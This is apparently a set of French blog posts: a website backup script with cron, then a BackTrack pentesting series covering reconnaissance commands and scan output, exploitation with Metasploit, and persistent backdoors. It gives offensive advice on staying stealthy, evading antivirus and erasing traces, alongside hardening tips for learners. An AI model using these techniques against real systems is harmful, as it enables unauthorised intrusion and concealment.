Je clos cet article en précisant que la 1ère vulnérabilité est l’Homme. Sécuriser un réseau et un système est une action fondamentale, qui doit toujours rester à l’esprit du personnel informatique. Cependant, la formation du personnel de toute l’entreprise est également primordiale. Les grandes attaques très connues ont toutes commencées par une faille qui venait d’un ou plusieurs employés.

A bon entendeur,

La suite au prochain article : Exploitation.

Hop, c’est cadeau, voici un script tout simple pour sauvegarder automatiquement et périodiquement son site web :

• sauvegarde périodique (les fichiers sont conservés 15 jours)
• sauvegarde des bases de données (variables à changer)
• sauvegarde des fichiers du site (chemins à changer)

Ce n’est qu’un squelette, et vous êtes libres d’y ajouter votre grain de sel, n’hésitez pas à l’améliorer et à le partager ici !

#!/bin/sh
 
#définitions des variables :
datedujour=$(date +%Y%m%d)
fichierdujour=$(date +%Y%m%d)-SqlBackup.tar.gz
datequinze=$(date -d '15 days ago' +%Y%m%d)
 
# On afficher les infos date du jour et autre pour le log.
echo "Date du jour : $datedujour"
echo "Fichier du jour : $fichierdujour"
echo "Date il y a 15 jours : $datequinze"
 
#On supprime  toutes les sauvegardes existantes dans le dossier d'exécution
rm -f *.sql
 
# La commande dump :
mysqldump -h localhost -u LOGIN_BDD -pPASSWORD NOM_BDD > BDD.sql
 
#on archive tous les backups dans un zip a la date du jour
# tar czf $fichierdujour *.sql
 
#on sauvegarde les fichiers du repertoire web
tar -cvzf www.tgz /public_html/
 
#on cree le répertoire du jour et y place les backups
mkdir ~/backup/auto/$datedujour
mv *.sql  ~/backup/auto/$datedujour/
mv www* ~/backup/auto/$datedujour/
 
#on supprime le répertoire d il y a 15 jours s'il existe
if test -d ~/backup/auto/$datequinze; then
echo 'suppression des anciens backups vieux de 15 jours ou plus'
rm -rf ~/backup/auto/$datequinze
fi
 
#on supprime le tar.gz du jour
rm -f $fichierdujour

Puis exécuter :

crontab -e

Pour y ajouter la cron suivante :

0 0 * * * /root/scripts/backup.sh

Je peux maintenant dormir tranquille, cron s’occupe de tout…

Après une introduction sur la distribution Backtrack, voyons maintenant quelques techniques de collecte d’informations.

Cette première étape est fondamentale pour la suite. Sans les informations recueillies, vous serez incapables d’exploiter les failles d’un réseau ou d’un système.

Nous allons voir tout d’abord les moyens utilisés pour collecter ces informations et ensuite les techniques pour se protéger contre cela.

Les moyens engagés pour collecter des informations.

• Analyse du réseau

- Netdiscover : Outil de découverte réseau

Exemple :

netdiscover -i eth0 -r 192.168.128.0/24

Cet outil est une des premières étapes lorsque nous recherchons des victimes potentielles. Sans adresse IP, pas d’attaque… Un autre outil existe en interface graphique, et propose la découverte réseau couplée au scan de port, ainsi qu’à l’OS-Fingerprinting : Autoscan.

- Zenmap : Scanner de port en interface graphique (utilisant Nmap)

Exemple d’un scan « intense » :

nmap -T4 -A -v 192.168.128.132

Retrying OS detection (try #5) against 192.168.128.132
NSE: Script scanning 192.168.128.132.
Initiating NSE at 14:51
Completed NSE at 14:51, 0.17s elapsed
Nmap scan report for 192.168.128.132
Host is up (0.00057s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds

 

Nmap est l’outil de référence pour scanner les ports ouverts d’une machine. Je tiens à préciser que l’utilisation de Nmap peut réveiller un pare-feu, et avertir un utilisateur que sa machine a été victime d’un scan de port. Il faut donc l’utiliser avec discrétion, et ne pas hésiter à bien lire la documentation pour utiliser les bonnes options.

Nous n’irons pas plus loin pour le moment, la suite étant la détection de vulnérabilités.

• Analyse d’applications Web

Un serveur Web est toujours très bavard. Il peut renseigner pas mal d’informations précieuses, qui peuvent souvent compromettre la sécurité du système.

- whatweb : Obenir la version du serveur, les variables HTTP, ainsi que le nom de l’application Web installée

Exemple :

whatweb http://my1.fr/blog

- webshag : Outil qui permet de scanner un serveur web. Il propose entre autre de détecter l’arborescence du répertoire web, de détecter la version du serveur, etc. C’est en scannant un serveur Web que nous pourrons découvrir les différentes applications installées dessus, et pourquoi pas un CMS connu comme Joomla, ou WordPress.

- cms-explorer : Après avoir découvert quelle application web était installée sur un serveur Web, nous allons découvrir le thème installé, ainsi que les extensions utilisées. Ainsi, nous pourrons peut-être par la suite exploiter telle ou telle faille dans un plugin. Pour vous donner un exemple concret, les attaques XSS et SQLi sont les plus rependues actuellement sur le web et sont dans la plupart des cas la cause des défacements de sites web ou vols de bases de données.

- wafw00f : Script en python qui permet de détecter des pare-feu pour serveur Web (Reverse Proxy par exemple).

• Analyse de bases de données

 - msf : le fameux framework permet de détecter les bases de données Microsoft SQL.

Exemple :

# msf console

msf > use scanner/mssql/mssql_ping

msf auxiliary(mssql_ping) > set RHOSTS 192.168.128.0/24

msf auxiliary(mssql_ping) > exploit

[*] SQL Server information for 192.168.128.12:
[*] tcp = 1433
[*] np = SRVBDD-0pipesqlquery
[*] Version = 8.00.192
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = SRVBDD-0
[*] Auxiliary module execution completed

- SQLmap : Logiciel d’injection SQL, et prise de contrôle de base de données. Pas mal de tutoriels en vidéo sont disponibles ICI.

• Analyse des réseaux sans fil

Nous sommes de plus en plus connectés sans-fil. Que ce soit en bluetooth ou en wifi, les équipements sont toujours plus perfectionnés mais pas toujours bien sécurisés.

La suite logicielle aircrack-ng contient les outils wifi les plus puissants du moment.

- airodump : Outil de capture de paquets 802.11, capable d’enregistrer du traffic en clair, et même crypté. Dans un premier temps, il est nécessaire de scanner les réseaux sans-fil disponibles, pour ensuite voir ceux qui sont ouverts ou protégés. Les algorithmes de chiffrement sont précisés, et peuvent donc donner pas mal d’informations importantes pour une personne malveillante.

- bluediving : Logiciel de scan bluetooth, qui permet aussi de lancer des attaques contre les équipements trouvés.

• Rassembler, et partager les informations collectées

Que vous travaillez seul ou en équipe, les informations prises doivent êtres placées en lieux sûr, et surtout bien organisées. Backtrack propose un framework Open-Source nommé Dradis. Dans une interface web, insérez les résultats de vos scans NMAP, Nessus, vos notes, etc. Partagez-les grâce au serveur web intégré, tout en maintenant la confidentialité des données avec le module SSL activé par défaut.

Les moyens pour lutter contre la collecte d’information.

• Se protéger contre l’analyse du réseau

Pour se protéger contre les scans de ports ou encore les requêtes réseau étranges, il y a quelques règles à respecter :

- installer une solution pare-feu sur toutes les machines (clientes et serveurs).

- sur les machines Linux, installer le paquet psad  et suivez ce tutoriel plutôt bien fait qui permet de bloquer les scans de port.

- sur les équipements actifs, configurer une table de correspondances adresse MAC / adresse IP statique.

- utiliser des sondes IDS/IPS pour la détection d’intrusion. Elles écoutent le réseau pendant un certain temps, et sont capables de détecter un trafic anormal. Snort est une solution libre qui est très réputé dans le milieu de l’IDS.

- mettre à jour régulièrement les IOS des équipements actifs.

• Analyse d’applications Web

- sécuriser les serveurs Web (très longue tache). Pour Apache, voici un très bon guide établi par la NSA (National Security Agency) qui explique les différents points à configurer pour avoir un serveur web sécurisé.

- utiliser un reverse-proxy. Cloudfare propose une offre gratuite de base qui donne une bonne protection de serveur Web. Les requêtes HTTP passent d’abord par le reverse-proxy, et sont envoyées au serveur Web ; très utile pour se prémunir contre les attaques de déni de service (DOS).

- Lorsqu’on développe en langage dynamique (au hasard : PHP), protéger les variables, pour éviter les injections SQL. Voici un excellent tutoriel. Il faut également protéger tous les formulaires pour éviter les failles XSS. Paul Da Silva l’explique très bien sur son blog dans un cours comment se protéger contre ces attaques.

- Enfin, quand nous utilisons un CMS (comme WordPress, Drupal, Joomla, etc), la règle d’or est la mise-à-jour. Se tenir au courant soit directement sur le site officiel du CMS, soit via des extensions de mises-à-jour automatiques. Éviter d’utiliser trop de plugins sur son site, car certains contiennent souvent pas mal de failles. Choisir ses extensions, et les mettre à jour diminuera donc le risque d’attaque.

• Analyse de bases de données

- Pour se protéger contre les attaques SQL, il faut commencer par sécuriser la configuration du serveur. PostgreSQL, MySQL, Oracle, sont des systèmes de gestion de base de données puissants, mais pas toujours sûrs. Leurs configuration de bases sont souvent trop permissives, et doivent êtres sécurisées au mieux. Lors d’un précédent billet, j’explique comment sécuriser la configuration de PostgreSQL sous Debian. Supprimer les bases de données par défaut inutiles, les mots de passe par défaut (comme cela existe sur MS SQL), ainsi que tout autre paramètre commun à tous autre système. Bref, vous devez laisser le moins de traces possible de vous sur le réseau !

- Séparer les bases de données, créer des utilisateurs SQL, attribuer des droits sur les tables… bref, exploitez à fond les fonctionnalités proposées. Ne vous contentez pas d’une base de données contenant toutes les tables de plusieurs applications métier à la fois, d’un seul utilisateur ayant tous les droits qui exécute toutes les requêtes.

Un exemple : sur un serveur web nous avons un blog, et une application métier.

Déjà, il faut créer deux bases de données minimum (1 pour le blog, et 1 pour l’application métier). Ensuite, créer un utilisateur par base de données qui exécutera le code que vous programmerez lors du développement du site. Pour les tâches annexes, comme les sauvegardes, ou les requêtes SQL bien spécifiques, créer un utilisateur à part, qui aura des droits très restrictifs. Pour information, pour effectuer une sauvegarde de la base de données, un utilisateur avec les droits en SELECT et en LOCK TABLES sont suffisants.

• Analyse des réseaux sans fil

On ne le dira jamais assez : un réseau sans-fil doit être protégé par un algorithme de chiffrement, et si possible opter pour le WPA2. Oublier le WEP, ainsi que les réseaux ouverts. Quant aux équipements bluetooth, désactiver les services inutiles et ne se servir que du nécessaire. Protéger vos équipements comme vous le pouvez, soit par mot de passe ou par des algorithmes de chiffrements.

Note finale.

- Dans la 1ère partie, la liste d’outils est exhaustive, et heureusement ! Il y en a d’autres… tellement que je vous laisse chercher par vous même. La distrib’ Backtrack en propose quand même un bon panel.

- Dans la 2ème partie, je me suis permis d’aller un peu plus loin que prévu, afin que nous puissions y revenir en détail dans les prochains articles (notamment lors des exploitations de failles).

Prochaine étape : Evalutation de vulnérabilité

Source : ici, là, mais aussi mon moteur de recherche préféré, ainsi que la documentation des logiciels proposés.

A l’époque, c’était juste quelques paquets que j’avais installé sur ma Debian, et tout allait bien. Puis je me suis mis au développement web, donc il m’a fallu un logiciel d’audit (w3af et websecurify). S’est rajouté ensuite d’autres outils de découverte réseau pour assouvir ma curiosité.

Il y a un moment où je me suis dit, je veux un OS avec tous ces outils, et si possible une distribution Linux.

Nom de code : Backtrack
Famille : GNU/Linux
Etat du projet : en dev
Sources : Open-source + logiciels libres + logiciels proprios
Version stable actuelle : 5.0
Basée sur : Debian

Les présentations sont faites. Backtrack est donc une distrib Linux orientée sécurité. Elle est principalement pour réaliser des audits.

Je vais passer en revue tout ce que l’on peut faire avec BT, en précisant à chaque fois les outils que j’ai testés (et qui parfois m’ont fait halluciner).
Bien entendu, mon plan respecte une chaîne d’exploit standard.

Pour ceux qui ne voient pas où je veux en venir, je vous résume cela par un petit schéma :

Collecte d’informations -> Évaluation de vulnérabilités -> Exploitation -> Maintien d’accès

• Collecte d’informations

Cette étape permet avant toute chose de savoir qui sera notre victime, et comment elle est équipée : un serveur Windows 2003 ? un routeur Cisco ? un client Linux ? un Wifi protégé par une clé Wep ? un service SNMP un peu trop bavard ? Bref. Nous allons scanner le réseau pour collecter un maximum d’informations, afin d’en détecter ses faiblesses.
Parmi les outils proposés, voici ceux qui m’ont bien servi :

- nmap (à utiliser avec discrétion) : scanner de port, OS fingerprinting, détection de services
- autoscan : découverte réseau
- airodump-ng : écoute wifi
- webshag : audit de serveur web

Exemple de scan avec Nmap

Next step : évaluer ce qui est exploitable.

• Évaluation de vulnérabilité

Nous avons appris à connaître notre victime, maintenant nous allons rechercher ses faiblesses. Laissez 5 minutes votre conscience de coté, nous sortons l’arme lourde.

Sans blablater, voici mes outils préférés :

- Nessus : incontournable dans le monde de la sécurité, c’est certainement un des meilleurs outils d’audits. Après l’avoir installé, configuré, et mis à jour avec la commande nessus-update-plugins, vous avez entre les mains l’outil de référence pour scanner les services d’une machine distante. En plus de vous fournir un tas d’informations importantes sur votre cible, il vous permettra d’exporter les résultats sous forme de fichier XML, que l’on utilisera plus tard avec d’autres outils pour exécuter les attaques directement.
- cisco-auditing-tool : comme son nom l’indique, cet outil est dédié aux équipements actifs de la firme américaine.
- joomscan : outil d’audit de sites web faits avec le CMS Joomla. J’ai effectué des tests sur des sites à moi, et je suis devenu tout rouge quand j’ai vu ce qu’il me trouvait. Je vous conseille de prendre un calmant avant de lancer l’outil, si vous auditez votre propre site [humour].
- w3af & websecurify : 2 outils ultra-puissants pour l’audit de sites web : injections SQL, attaques XSS, etc… ces outils mettront le site distant à nu, et vous éclairerons sur les différentes failles que l’on pourra exploiter.
- sqlninja (MS SQL) & sqlmap (MySQL) : 2 outils de découvertes de failles sur des bases de données SQL

A ce stade là, on peut dire que l’audit est terminé. Quoi, c’est tout ? bien sûr que non. Je vous ai donné mes outils favoris, mais dans certains cas il m’a fallu dénicher un outil bien précis pour tel ou tel service.

Imaginons donc que vous connaissez bien votre victime : son adresse IP, le système d’exploitation, sa version, ses services, leurs versions, etc.

La prochaine étape est décisive : l’exploitation.

• Exploitation

C’est une étape où il faudra utiliser au mieux ses connaissances en informatique, et je pèse mes mots. J’ai mis un peu de temps pour obtenir mon premier shell sur une victime, avec un peu de sécurité entre bien sûr (pour les curieux, mes tests se font en environnement virtuel uniquement).
Donc je vous met en garde tout de suite : il vous faudra certaines qualités humaines pour réussir l’exploitation de failles : patience, persévérance et discrétion.

- Patience : les outils sont parfois longs à prendre en main, et des moyens d’exploit demandent parfois de l’attente comme le keylogging par exemple
- Persévérance : une pénétration ne fonctionne rarement du premier coup, ou alors c’est que vous maîtrisez le truc déjà. Réessayer avec d’autres outils, ou avec d’autres méthodes. Bien lire la doc avant de commencer toute action
- Discrétion : la devise de BT résume bien le message que je veux vous faire passer : The quieter you become, the more you are able to hear. Ne vous lancer pas dans une attaque style GROS BOURRIN JE PETE TOUT ET JE LAISSE PLEIN DE TRACES !!!! non, restez discrets, et supprimez toute preuve de votre accès (ou tentative d’accès) en partant.

Ah, j’ai failli oublié, mes outils préférés d’exploitation :

- Metasploit Framework : incontournable. Il contient tous les exploits et payloads dont vous aurez besoin pour pénétrer un système. Armitage est une interface graphique au framework, qui ma foi est très utile. Cependant, la ligne de commande est à maîtriser pour se faire la main ! Je vous laisse fouiner sur le net pour y trouver toutes les explications nécessaires à son utilisation.

Après exploitation de l’exploit ms08_067_netapi, j’ai obtenu un shell.
- cisco-global-exploiter : outil regroupant les différents exploits vers le matériel Cisco.
- la suite aircrack-ng : outil indispensable pour le cracking wifi.
- beef-ng : outil d’exploitation via le navigateur web (utilisé pour l’ingénierie sociale)

Petite note perso sur l’ingénierie sociale :

Pour ceux qui ne savent pas ce que c’est, je les invite à consulter la définition, car c’est une notion très importante en sécurité. Je dirais même plus, c’est 70% du travail. Pour être hacker, il ne faut donc pas uniquement des talents en informatique, mais également un peu de culot, et surtout penser à la place de sa victime.

Enfin, une fois le système distant pénétré, il est parfois utile d’y revenir plus tard. C’est la prochaine et dernière étape.

• Maintien d’accès

Plutôt que de se retaper tout ce qu’on vient de faire, on va installer un backdoor sur le système, et si possible invisible et indétectable aux yeux de l’utilisateur et surtout des antivirus/firewalls.
C’est avec cette étape que j’ai appris plein de trucs sur les antivirus. En fait, c’est en créant un virus qu’on apprend ce qu’est un virus.

Voici les outils indispensables :

- Metasploit Framework : Et oui, encore lui… décidément, il peut tout faire ! (ou presque )
- Cryptcat : version chiffrée de netcat, un des moyens les plus simples et plus rapides de créer un backdoor.

Après avoir fait tout ça, nous méritons une petite pause bien méritée. Je vais en profiter pour préciser certains trucs.

Tout d’abord, j’ai longtemps hésiter à écrire cet article, car je ne veux pas qu’on pense que je suis un vilain hacker boutonneux qui veut « hack the planet ». Non. Je veux apprendre et comprendre.

- Apprendre ce que les hackers font, pour mieux les appréhender.
- Comprendre comment ils font pour avoir un certain recul sur les protocoles que j’utilise sur mes systèmes.

J’ai appris plusieurs choses :

- des notions techniques que je ne connaissais pas (dont le vocabulaire)
- comment fonctionnait un payload, et un exploit
- comment se protéger un maximum
- qu’une grande partie du travail était de l’ingénierie sociale
- qu’un système n’était jamais parfaitement sécurisé.

Ensuite, je voulais dire que ce n’était qu’une introduction à une série d’articles consacrés à Backtrack. Je n’ai donc pas parler de certaines étapes intermédiaires, comme par exemple l’escalade de privilèges, ou encore du test de stress.

Une dernière chose. Backtrack contient de nombreux outils d’audit, mais également un serveur web apache, un serveur de BDD, ainsi que d’autres services bien utiles. Il convient de la mettre à jour régulièrement afin d’avoir un système stable, sécurisé, et surtout d’avoir les dernières nouveautés en matière d’exploitation. Certaines applications demandent également des mises à jour manuelles (comme Nessus et MSF).

Je termine par ces mots : entraînez-vous, amusez-vous, mais choisissez votre camp. Backtrack n’est pas une distribution pour pirater son voisin de palier, mais bien un système d’exploitation utilisé par des professionnels de l’informatique, dans un but purement conventionnel. C’est donc à vos risques et périls que vous utiliserez cet outil ultra-puissant.

Un grand merci aux développeurs.